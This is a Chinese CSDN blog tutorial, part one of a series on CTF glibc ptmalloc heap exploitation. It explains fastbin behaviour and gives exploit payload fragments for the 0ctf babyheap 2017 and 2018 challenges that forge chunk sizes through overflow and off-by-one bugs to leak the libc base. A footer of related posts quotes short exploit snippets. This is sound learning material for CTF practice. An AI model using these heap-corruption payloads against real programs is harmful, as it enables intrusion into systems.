CTF 用户态ptmalloc pwn总结(一)

最新推荐文章于 2024-05-11 09:52:27 发布
最新推荐文章于 2024-05-11 09:52:27 发布
阅读量886 收藏 2
点赞数
文章标签: pwn ctf 用户态
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41918450/article/details/82827949
版权

CTF 用户态linux ptmalloc pwn总结

ctf中用户态的ptmalloc利用五花八门,也比较常见,在此想结合着具体的实例去分析讲解一下各类的pwn题目,题目并不会每个都仔细分析
准备分成两部分:第一部分漏洞点位置?如何利用漏洞去实现任意写?
第二部分:可以造成写之后,写哪里?如何实现getshell
以第一部分为主,第二部分只准备两篇文章,第一篇写常规的,第二篇单独介绍IO_FILE系统getshell,

第一部分的目录如下:

fastbin attack

unlink

largebin attack

house系列

fastbin attack

注:下文用到的alloc等函数是自己根据题目利用pwntools封装的函数,下面的show等也是,不再重复,这里的代码仅仅是为了举例方便,感兴趣的同学可以事后自己到github上搜索payload,在这里不贴了。

先讲一下fastbin的一些特性,可能会用到的:

1.fastbins不会触发unlink,即free掉fastbin,并不会修改与之相邻的chunk的preinuse位。

2.fastbins与smallbins的关系:fastbins 大小: smallbins大小: 两者之间有重合,但是申请和释放时,会先判定fastbins中有无满足的情况,才会找其他的。

3.fastbins单向链表,只有fd指针

4.fastbins consolidate:即当申请一块大内存:在申请一块大内存的时候,在搜索smallbins和largebins之前,首先会便利fastbins链表,将所有相邻fastbins合并,之后将合并后的放入unsorted bins链表。

fastbins的利用:

第一种最简单的,直接存在堆漏洞的无限溢出或者是off by one
举例:0ctf babyheap 2017 2018

0ctf连续两年的babyheap都是最简单的fastbins attack
2017即当出现了一个简单的溢出,可以改写下一个chunk的size位时:

1.申请两个fastbins

alloc(0x50)#0

alloc(0x40)#1

2.利用第一个fastbins chunk的溢出,改写第二个chunk size位,改为0x71

payload = ‘a’*0x50+p64(0)+p64(0x71)

fill(0,payload)

3.改写了下一个chunk之后,再申请一块chunk时,就存在与#1之间的重合区域,可以改写1,这时将1free掉,进入small bins。smallbins第一个chunk的fd和bk都指向main_arena,此时,通过之前已经改写好的1,即可实现main_arena的地址泄漏,减去固定的偏移(自行调试获得)即可获得libc的基址,绕过来aslr。

alloc(0x100)#smallbins 2

payload1 = ‘a’*0x10+p64(0)+p64(0x71)#为了防止在free(1)的时候崩掉,必须将1后面的一块chunk的size位设置为不为0

fill(2,payload1)

free(1)

alloc(0x60)#此时,会将刚才一块free掉的再申请出来,这个时候其size已经足够打印出下一位small bins的fd和bk

alloc(0x30)#随便申请一块chunk防止topchunk 的合并
free(2)

s = show(1)

main_arena = u64(s[-8:])

现在已经实现了libcleak,至于如何实现接下来的利用getshell,放在第二部分总结

第二个例子是0ctf2018 babyheap,相对于2017增加了对chunksize大小的控制,溢出也变成了offbyone
offbyone和offbynull在ctf题目中很常见,一般是在判断时多加了一个等于号,或者数组的下标忘记减一,就置零。

利用思路:先申请三块相连的fastbins,要是0x18这种大小,将presize也申请出来,才能覆盖chunksize。

alloc(0x18)#0

alloc(0x28)#1

alloc(0x58)#2

alloc(0x28)#3

alloc(0x38)#4

但这道题无法像2017的题目一样利用small bins去泄漏libc地址,因此需要更新将,size改为使chunk被释放后大于fast bins范围,先进入unsorted bins,利用其fd和bk指向main_arena,leak libc。
update(0,‘a’*0x18+p64(0x61)

update(1,‘a’*0x28+p64(0x61))

update(2,‘a’*0x30+p64(0)+p64(0x21))

delete(1)

alloc(0x58)#1此时1 与 2 之间存在着重合部分,可以得到bk和fd

update(1,‘a’*0x20+p64(0+p64(0x91)))#2之后0x91的位置刚好到了4,因此不需要额外伪造chunk绕过检查。

这个时候释放2

free(2)

2进入了unsorted bins,此时通过1可以查看main_arena,实现了libc的leak。
下一篇文章准备更新unlink,其与各种 bins attack结合密切

obfuscation123
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf题库ctf-pwn赛题收集
03-31
CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二进制反...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
pwn中堆溢出的几种模式及相应的利用方法小结
snowleopard_bin的博客
08-01 2659
一、fastbin(16Bytes<= size<=64Bytes )    1、覆盖fd , 向任意地址写任意内容(write-anything-anywhere) buf1 = malloc(32)#1 buf2 = malloc(32)#2 free(2) free(1)#first one to be allocated buf1 ...
堆上的off-by-one+unlink
qq_41252520的博客
08-31 457
off-by-one 由于对字符串长度校验不恰当,导致写入数据的时候多写了一个字节,这种情况就叫做 off-by-one 。 正所谓一个巴掌拍不响, off-by-one 也是,必须要结合其他的漏洞或者程序的具体实现才能真正构成威胁 off-by-one 有两种形式: (1)多写入一个任意字节,示例代码: for(int i=0;i<=len;i++){ read(0,buf[i],1...
2024年最新CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1),学习路线+知识点梳理
最新发布
2401_84264244的博客
05-11 451
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
攻防世界PWNpwn11题解
seaaseesa的博客
02-09 681
pwn11 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序会把字符串里的I替换成you,导致strcpy后,s出现栈溢出,直接覆盖到后门函数地址即可 后门函数 综上,我们的exp脚本 #coding:utf8 from pwn import * sh = process('./pwn11') sh = remote('111.198.29.45',31...
堆漏洞挖掘中chunk的实际大小、最低大小、 mchunk_size成员
董哥的黑板报
07-28 3774
struct malloc_chunk { INTERNAL_SIZE_T mchunk_prev_size; INTERNAL_SIZE_T mchunk_size; struct malloc_chunk* fd; struct malloc_chunk* bk; struct malloc_chunk* fd_nextsize; /* d...
【BUUCTF - PWNpwn1_sctf_2016
古月浪子的博客
03-19 4193
checksec一下 找到漏洞函数,s的长度为0x3c,而我们只能输入32个字符,不足以栈溢出,但是发现replace函数会把输入的 I 替换成 you,这样的话输入20个 I 就能填满s 找到后门函数 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.lo...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF PWN 武器库题
12-12
在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,其中PWNPwn All The Things)类别涉及的是程序漏洞利用技术。"CTF PWN 武器库题"通常指的是这类竞赛中的一个问题,挑战者需要利用编程技巧来解决...
CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
[Bugku CTF——Pwn] pwn1
Y_peak的博客
03-22 237
[Bugku CTF——Pwn] pwn1 题目地址:https://ctf.bugku.com/ 额, 直接nc连接上,就可以直接得到shell 好水哦,新手玩玩就好,老鸟勿喷 无语凝噎 cat flag就好
解决搭建windows pwn和linux pwn下遇到的不回显问题
fjh1997的博客
03-23 1346
最近给学员出题,windows的pwn和linux的pwn,linux下面使用xinetd,windows下面则使用Ex师傅的win_server即可。项目地址 然而我遇到了个问题,就是我nc连上我的题目之后,那个“请输入密码”的提示文字一直没出来,等了半天也不行。 直到我输入了个回车,然后“请输入密码:”的文字才跳出来,但同时登录失败也跳了出来,这让我没法输入密码。 之后我查询了资料得知,这...
D-Link系列路由器漏洞挖掘入门
12-17 468
D-Link系列路由器漏洞挖掘入门 前言 前几天去上海参加了geekpwn,看着大神们一个个破解成功各种硬件,我只能在下面喊 6666,特别羡慕那些大神们。所以回来就决定好好研究一下路由器,争取跟上大神们的步伐。看网上公开的D-Link系列的漏洞也不少,那就从D-Link路由器漏洞开始学习。 准备工作 既然要挖路由器漏洞,首先要搞到路由器的固件。 D-Link路由器固件下载地址:...
一步一步pwn路由器之uClibc中malloc&&free分析
weixin_30596165的博客
08-03 500
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 栈溢出告一段落。本文介绍下 uClibc 中的 malloc 和 free 实现。为堆溢出的利用准备基础。uClibc 是 glibc 的一个精简版,主要用于嵌入式设备,比如路由器就基本使用的是 uClibc, 简单自然效率高。所以他和一般的x86的堆分配机制会...
glibc从堆任意分配到攻击IO流达到泄露信息&realloc特性&unsorted bin expand总结
seaaseesa的博客
04-17 1022
glibc从堆任意分配到攻击IO流达到泄露信息&realloc特性&unsorted bin expand总结 有些情况下,仅有malloc/calloc/realloc和free两种功能,并且可以实现任意地址分配,如果想要达到利用,还需要知道地址,在glibc下,一般就是攻击_IO_2_1_stdout_结构体来实现信息泄露,通过低字节覆盖unsorted bin留下的main...
格式化字符漏洞 tamuCTF pwn3 writeup
charlie_heng的专栏
06-05 1000
之前一直不怎么会格式化字符串的漏洞,刚好碰上这道题,学习一波首先看下main函数,读一个字符串,然后打印出来,之后直接exit(0) 无法利用栈溢出跳转,但是prinf是直接打印读取的东西,这里就存在一个格式化字符串漏洞。 这里推荐一个格式化字符串漏洞入门的教程: http://codearcana.com/posts/2013/05/02/introduction-to-format-stri
smallbin double linked list corrupted
link200809的专栏
12-11 4727
[20131210205216] G1002 Ftp Waitting.. *** glibc detected *** /home/gdsbi/aiinsight/aitools/bin/tclsh: malloc(): smallbin double linked list corrupted: 0x0000000001824980 *** ======= Backtrace: =====
linux下堆溢出实验和一些tips
一个码农的笔记
09-26 4790
首先我的实验环境和教程均来自http://staff.ustc.edu.cn/~sycheng/ssat/,我这里讲的是《缓冲区溢出–堆溢出》这个课程的实验 实验开始,首先你要准备好环境,我的操作系统是BOF_debian2.4.18,你可以在https://pan.baidu.com/share/link?uk=447211&shareid=2477082370#list/path=%2F&pa
ctf竞赛权威指南pwn篇 pdf
11-05
CTF竞赛权威指南Pwn篇》是一本关于CTF(Capture The Flag)竞赛中的Pwn(利用漏洞攻击代码)题目的权威指南。CTF竞赛是一种网络安全竞赛形式,旨在通过解决各种安全相关的难题来锻炼和提高参赛者的技能。 Pwn篇是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值